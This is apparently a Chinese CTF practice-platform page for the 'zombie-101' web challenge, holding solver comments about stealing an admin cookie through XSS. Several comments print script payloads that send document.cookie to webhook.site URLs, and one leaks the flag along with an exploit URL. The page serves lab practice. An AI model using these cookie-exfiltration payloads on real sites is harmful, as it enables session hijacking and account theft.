zombie-101WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 127
提  示:
描  述:
wctf{}
评论
15756309355 1月前

斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器

回复 0
yearling 1月前

我也拿不到cookie,难绷

回复 0

missa 2月前

请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,

回复 0

一只小羊 3月前

<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>

回复 0

1512624649 5月前

flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252

回复 1

15614005380 7月前

典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个

回复 0

meilanzhuju 7月前

有点晕乎

回复 0

qingfeng1115 10月前

<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a

回复 0

yituoshi 10月前

Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08

回复 0

justsosoloveyou 11月前

第一个框反射xss,第二个框存储xss。将第一个框触发xss的url输入到第二个框,后台自动访问url后即可触发xss盗取cookie里的flag。注意需要将js编码。

回复 3
lltong 7月前

将js编码,是怎么编码呢

回复 0

WriteUp

image
a2cai

3 金币

评分(0)

暂无评分

解题动态

fogoo 攻破了该题 10天前
garlicfish 攻破了该题 13天前
菜狗打比赛 攻破了该题 22天前
mk012 攻破了该题 1月前
1311675072 攻破了该题 1月前
Garmin 攻破了该题 1月前
POEighT 攻破了该题 1月前
putianyi 攻破了该题 1月前
只会写CTF这几个字 攻破了该题 1月前
320168062 攻破了该题 1月前
13353488617 攻破了该题 1月前
15756309355 攻破了该题 1月前
Yuelan 攻破了该题 1月前
923096443 攻破了该题 1月前
dimo 攻破了该题 2月前
missa 攻破了该题 2月前
yinbug 攻破了该题 2月前
竹盐笙熙 攻破了该题 2月前
88788 攻破了该题 2月前
liuwc 攻破了该题 2月前
问题反馈